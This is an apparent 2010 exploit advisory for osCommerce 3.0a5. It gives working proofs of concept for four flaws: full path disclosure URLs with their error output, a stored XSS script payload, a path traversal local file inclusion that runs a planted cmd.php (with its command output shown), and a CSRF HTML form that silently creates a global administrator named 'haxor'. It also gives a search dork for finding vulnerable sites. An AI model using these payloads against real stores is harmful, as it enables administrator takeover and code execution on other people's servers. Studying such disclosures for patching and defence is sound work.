oscommerce-xsslfixsrf.txt
Posted on 01 May 2010
# # # Multiple Vulnerabilities in osCommerce # # [Vendor SW]: osCommerce # [Version]: 3.0a5 (but possible all versions) # [Vendor URL]: www.oscommerce.com # [Tested on]: Ubuntu Server 9.10 # [Category]: Webapps/0day # # [Date]: 30 Apr 2010 # [Author]: Alberto Fontanella # [Author WEB]: ictsec.wordpress.com # [Author EMAIL]: itsicurezza<0x40>yahoo.it # # # inText:"Powered by osCommerce" -> 6.850.000 # # [ 1 ] - [ Full Path Disclosure ] http://[host]/templates/default/content/index/product_listing.php http://[host]/templates/default/content/info/info_contact.php ...etc Fatal error: Call to undefined function osc_image() in /var/www/templates/default/content/index/product_listing.php on line 16 http://[host]/includes/classes/search.php ...etc Warning: require(includes/classes/products.php) [function.require]: failed to open stream: No such file or directory in /var/www/includes/classes/search.php on line 15 Fatal error: require() [function.require]: Failed opening required 'includes/classes/products.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/includes/classes/search.php on line 15 [ 2 ] - [ Persistent XSS ] http://[host]/products.php?oscommerce-tshirt Put in Front field: <script>alert("XSS")</script> Click "Add to Cart" Checkout section recalls XSS stored. [ 3 ] - [ Local File Inclusion ] http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd ...etc You have to put cmd.php in / uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ubuntu 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux [ 4 ] - [ XSRF ] To create a new Administrator with Global Privileges: <html> <body> <form action="http://[host]/admin/index.php?administrators&action=save" method="post"> <input type="text" name="user_name" value="haxor"> <input type="text" name="user_password" value="hax0r"> <input type="text" name="modules[]" value="0"> <input type="hidden" name="subaction" value="confirm"/> <input type="submit" value="Save"> </form> </body> </html> ...etc [ EOF ]
